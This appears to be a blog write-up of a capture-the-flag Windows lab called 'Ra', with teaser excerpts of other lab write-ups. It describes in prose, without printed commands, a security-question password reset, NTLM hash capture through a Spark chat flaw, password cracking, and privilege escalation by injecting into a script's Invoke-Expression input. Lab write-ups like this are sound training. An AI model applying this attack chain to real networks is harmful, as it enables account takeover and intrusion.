Ra Writeup

 


Ra link


Enumeration



Starting off with an nmap scan, we can see we have a plethora of services running on this machine.
Lets start off with checking out the webserver that's running and then move onto looking at smb.





Looks like we're starting off strong, we seem to have access to a company portal with the ability to reset user passwords and also a list of IT staff which is going to come in very handy, we also seem to know one of the pieces of software they're using, openfire, which after a quick google appears to be a real time collaboration/messaging software, this could prove useful for finding out some personal details so we can reset one of the IT staff passwords.

Hovering over each of the IT staff shows a link to xmpp which is part of openfire, this gives us a bunch of email addresses which will come in handy for the username aspect of the password reset.

If you can't access the rest password page, make sure you add the domain and any subdomains to your /etc/hosts file so you can access them

Lets keep digging and see what else we can find in the company portal.


Running a quick gobuster scan doesn't reveal anything exciting, also visiting the https site we get prompted for basic authentication, so that's something to remember for later incase theirs something interesting hidden behind that.


Running a gobuster dns scan against the dns server we don't find anything too interesting, we already know about fire.windcorp.thm from looking at the password reset.

I attempted to get cewl to extract the emails and names associated with the xmpp address but it just didn't want to no matter what I did so I quickly made a few wordlists manually, one wordlist contains all the email addresses for each of the IT staff members, another contains the usernames from the email addresses, the next contains their names and the final one contains just the surnames.

Lets capture a password reset in burp and use intruder to try bruteforce some of the details, mothers maiden name seems like a good starting point as theirs a chance one of the staff members shares the same surname, 2 staff members I noticed have the same email address, I assume some of these are possibly randomly generated nonsense for the box and it's just accidentally selected the same email twice, but we'll include them in our wordlists anyway just incase.


Using the pitchfork attack type and checking each of the responses showed that none of the staff members had the same surname as their mothers maiden name, we could use a wordlist of common surnames and bruteforce it but that could trigger account lockouts so lets avoid that.

Going back to openfire, a quick google search shows that there is a large number of versions that are vulnerable to CVE-2023-32315 and the login page exposes the version on it, lets head over to port 9090 and check what version of openfire is running.


Looks like we're on 4.5.1, based on the details of the cve, the first affected version is 3.10.0 and the first patch released was for version 4.6.8, this means our version should hopefully be vulnerable.

Further reading into the cve details reveals that it allows us to inject an admin user into the system and then upload a webshell or in the case of the metasploit module, it uploads a reverse shell, lets load up metasploit and see if we can get a shell.


And nothing, I tried a couple times and tried manually exploiting the vulnerability and I wasn't successful, I was able to read the log files meaning the path traversal vulnerability works, but it seems that user creation may have been patched possibly which means we can't exploit it.

Lets take a step back and look at everything we have on the main page again; we must be able to reset a users password.



Looking at the bottom of the page we have some information about employees and it seems lilly talks about bringing her dog to work, taking a look at the page source it appears the photo is named lilyleAndSparky.jpg, lilly isn't in our list of IT staff, trying lily doesn't work, but looking at the name of that file again it's labeled as lilyle, lets try that and see if that works.



Awesome it worked, lets take these credentials and try gain access to the smb share and see what's there.




Attempting smbmap failed, but listing the shares with smbclient worked, lets try connecting to the Shared share with lily's account.


Looks like we have our first flag and also some application files, lets grab it all and start taking a look at what it is.
A quick look at first it appears that spark is a real time collaboration software which most likely ties into openfire and xmpp, so lets load that up on our machine and see if we can get some details from it to gain access to an IT staff members account.

Exploitation


After spending way too long trying to get that particular version of spark working I ended up just downloading and installing the latest version 3.0.2 which no longer required JRE.

In order to connect I also needed to go into settings, then security and then tick "Disable certificate hostname verification" otherwise the application throws errors about the certificate and won't allow a connection.


Finally we're connected, looking back at the company portal IT staff list we can see Buse Candan is showing as online, lets see if we can bring up a chat with them.


Now that we have the chat, a quick google shows that version 2.8.3 suffers from CVE-2020-12772, we can still exploit this as we know that Buse will be running that version based on the shared drive files, our version shouldn't affect the exploit.




And sure enough after running responder and sending the img tag we receive back the ntlm has, now we can crack the hash with john.



Using the cracked password we can now login with evil-winrm and start exploring the machine, but first lets go grab our next flag.


PrivEsc

Looking at the desktop we see some folders, they don't contain anything interesting though so lets keep exploring.


Looking through the root directory we can see there's a folder called scripts, that could be interesting to look at.


Looks like there's a powershell script that's running every so often, lets take a look at what the file is doing.


Looking at the file and based on the name of the script it's checking that servers are up, if we look into the script we can see it's iterating through a hosts.txt file stored in the user brittanycr and then passes each line to Invoke-Expression.
Invoke-Expression is the interesting command here because whatever string gets passed to it gets run as a command, so we should hopefully be able to gain some elevated privileges if we modify the host.txt file.



Taking a further look at what groups we are apart of we can see we are in the IT ad group, further enumerating on that we can see that the IT group is a member of the Account Operators group, this means we should hopefully be able to update brittanycr's password, lets give it a shot.



Looks like we might have just been successful, lets try log into a new evil-winrm session with brittanycr, we also added a new user named haxed who we will add to the Administrators group.



Doesn't look like we can connect to their account through evil-winrm, lets try smb.


And we have success, lets navigate to brittanycr's files and then download the hosts.txt file and edit it.


Adding the simple string at the bottom of the file should be passed onto invoke-expression and create us a new administrative user named haxed, lets replace the old file using smbclient


Now that our modified hosts.txt file is there, we can wait a couple minutes for the script to run again and we should be able to sign in as our admin user, we can also use buse to check when the log.txt file gets updated and then we'd know that the script has run.


And we have success! Now we can go grab that final flag!



Comments

Post a Comment

Popular posts from this blog

Biteme Writeup

Image
  Biteme link Enumeration Firing up nmap we can see that we have 2 ports open, 22(ssh) and 80(http), let's take a quick look at the webserver first and see what's running on it. Just the default apache page, lets run gobuster and see if we can find any directories. Looking at gobuster we only seem to have the one directory, /console/  so let's take a look at that, we may need to possibly run a bigger wordlist later if we can't net anything from this. Interesting, we have a login page with a captcha, taking a quick look at the page source doesn't reveal any hidden details so let's take a look at what happens and what data is submitted when we attempt to login. Interesting, it seems there was a message logged to the console when we attempted to sign in stating that php file syntax highlighting has been turned on. We can also see that when we submit a sign in attempt there is an extra variable of clicked = yes. Lets run a quick gobuster scan on the console director...
Read more

0day Writeup

Image
  0day link Enumeration Running an initial nmap scan we can see that we have port 80 and 22 open, so lets start by taking a look at the website to see what we have. Nothing exciting on the main page and looking into the page source we don't have much so lets run gobuster and see what that brings us back. Gobuster returns a whole bunch of interesting directories, we'll start by looking at robots.txt just incase there's anything extra listed in their that gobuster didn't find and then we'll slowly start working through each of the folders that returned a 301 redirect. Nothing really interesting on any of the directories, mainly looks to be a bunch of rabbit holes, the /backup/  directory did have a private rsa key in it though which we'll copy and save for later just incase, but we don't have a known user that it could be associated with so it's not much use. Next step would be to look for exploits, usually with /cgi-bin/  exposed we'd be hoping for an...
Read more

Olympus Writeup

Image
  Olympus link Enumeration Starting off with a nmap scan we can see that we have two ports open, 22(ssh) and 80(http), let's start by taking a look at the web server first. Looks like we instantly get redirected to olympus.thm so we need to make sure we add this to our /etc/hosts  file. Once we get to the website we can see that there is a message letting us know that we can still visit the old version of the website on this domain, so lets run gobuster and see if we can find a directory that will take us there. Taking a look at the gobuster scan we can see that we have a /~webmaster/  directory so we should go check that out, we can also see that the site is running a mysql db based on the /phpmyadmin/ Looks like we have a pretty basic CMS system, there's some interesting details on this page other than the Admin and Register links, we should probably go look for that wordlist quickly, we can also run another gobuster scan on this directory as well to see if we find anyt...
Read more